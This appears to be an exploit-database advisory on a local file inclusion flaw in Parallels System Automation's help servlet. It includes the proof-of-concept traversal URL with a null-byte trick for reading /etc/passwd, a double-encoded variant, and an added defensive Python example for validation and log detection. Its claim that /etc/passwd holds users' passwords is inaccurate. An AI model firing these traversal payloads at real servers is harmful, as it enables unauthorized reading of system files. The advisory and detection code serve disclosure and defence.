Vendor: Parallels System Automation (PSA)
By: Pouya Daneshmand
CVSS: 6.4 (MEDIUM)
Type: Local File Inclusion
CWE: 98
Product Name: Parallels System Automation (PSA)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Parallels System Automation (PSA) Local File Inclusion

An attacker can exploit a local file inclusion vulnerability in Parallels System Automation (PSA) to read sensitive files on the server. The traversal payload is supplied through the 'locale' parameter of the 'servlet/Help' URL (the proof-of-concept below also sets 'help_id', but the '../' sequence and the trailing null byte sit in 'locale'), which lets an attacker include arbitrary files from the web server. This can be exploited to include the '/etc/passwd' file, which contains the usernames and passwords of all users on the system.

Mitigation:

The best way to mitigate this vulnerability is to validate the 'locale' and 'help_id' values against the set of help files the servlet is expected to serve, rather than using them to build a filesystem path directly. Additionally, access to the vulnerable URL should be restricted to trusted users.
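The code below is an added example, not code from the original advisory or from Parallels. It shows, in Python, the two defender-side pieces the description and the mitigation paragraph call for: a lookup routine that derives a help file from 'locale' and 'help_id' with an allowlist and canonical-path confinement instead of string concatenation, and a detection pass over web-server access-log lines that flags the traversal-plus-null-byte pattern of the proof-of-concept URL. The help directory layout, the locale allowlist, the log lines and all function names are assumptions constructed for the example; the trailing %00 in the PoC is a null-byte truncation trick (it cuts off any suffix the server appends after the user value), which is why a NUL check is part of the validation.

```python
"""Added example: not part of the original advisory and not Parallels' code.

  * safe_help_path()          - how a help-page lookup should derive a file
                                path from 'locale' and 'help_id': allowlist
                                first, canonical-path confinement second.
  * find_traversal_requests() - a detection pass over access-log lines that
                                flags query parameters carrying traversal
                                sequences or null bytes.

The help directory, file naming, locale list and log lines are all
constructed for this example; the real PSA layout is not known here.
"""
import re
from pathlib import Path
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

HELP_ROOT = Path("/opt/psa/help").resolve()      # hypothetical help-book root
ALLOWED_LOCALES = {"en", "de", "fr", "ru"}        # constructed allowlist
HELP_ID_RE = re.compile(r"[a-z0-9_]{1,64}")       # help_id is user input too

# Apache/nginx "combined"-style access line: client, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def safe_help_path(locale: str, help_id: str) -> Optional[Path]:
    """Map (locale, help_id) to a help file, or return None if rejected.

    Rejecting a NUL byte early matters because the PoC relies on %00 to
    truncate whatever suffix the servlet appends after the user value.
    """
    if "\x00" in locale or "\x00" in help_id:
        return None
    if locale not in ALLOWED_LOCALES or not HELP_ID_RE.fullmatch(help_id):
        return None
    candidate = (HELP_ROOT / locale / f"{help_id}.html").resolve()
    # Defence in depth: even though both inputs passed the allowlist, confirm
    # the canonical path is still inside HELP_ROOT before touching the disk.
    if HELP_ROOT not in candidate.parents:
        return None
    return candidate


def is_traversal_value(value: str) -> bool:
    """True if a once-decoded query value still carries traversal or NUL."""
    decoded = unquote(value)  # second pass catches double-encoded payloads
    return any(token in decoded for token in ("../", "..\\", "\x00"))


def find_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, parameter, once-decoded value) for every suspicious
    query parameter seen in the supplied access-log lines."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client_ip, _method, target, _status = m.groups()
        query = urlsplit(target).query
        # parse_qs percent-decodes once, so %00 becomes a real NUL here.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if is_traversal_value(value):
                    hits.append((client_ip, param, value))
    return hits


# Constructed access-log sample: one benign help request, the advisory's PoC
# URL, a double-encoded variant aimed at help_id, and an unrelated POST.
LOG_LINES = [
    '203.0.113.10 - - [12/Mar/2020:09:14:01 +0000] "GET /servlet/Help?system_id=pem'
    '&book_type=login&help_id=change_password&locale=en HTTP/1.1" 200 5120',
    '203.0.113.77 - - [12/Mar/2020:09:14:09 +0000] "GET /servlet/Help?system_id=pem'
    '&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00'
    ' HTTP/1.1" 200 1834',
    '198.51.100.5 - - [12/Mar/2020:09:15:30 +0000] "GET /servlet/Help?help_id='
    '%252e%252e%252fetc%252fpasswd&locale=en HTTP/1.1" 404 231',
    '203.0.113.10 - - [12/Mar/2020:09:16:00 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print(safe_help_path("en", "change_password"))
    print(safe_help_path("/../../../../../../etc/passwd\x00", "change_password"))
    for ip, param, value in find_traversal_requests(LOG_LINES):
        print(f"{ip} sent traversal in {param!r}: {value!r}")
```

The allowlist is the real control; the `resolve()`-and-`parents` check is there so the lookup stays safe even if someone later widens what `locale` or `help_id` may contain. On the detection side, the second `unquote()` is what catches the double-encoded request that a single-decode rule would miss, so a rule built only on the literal `../` string in the raw log line would be incomplete.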
Source

Exploit-DB raw data:

#################################################################
# Application Info:
# Name: Parallels System Automation (PSA)
# Vendor: http://Parallels.com
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
https://cp.site.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://Pouya.info
# Contacts: pouya@pouya.info
###################################################################
# Original Document: http://blog.pouya.info/userfiles/vul/PSA-LFI.pdf
###################################################################
# Securitylab.ir
###################################################################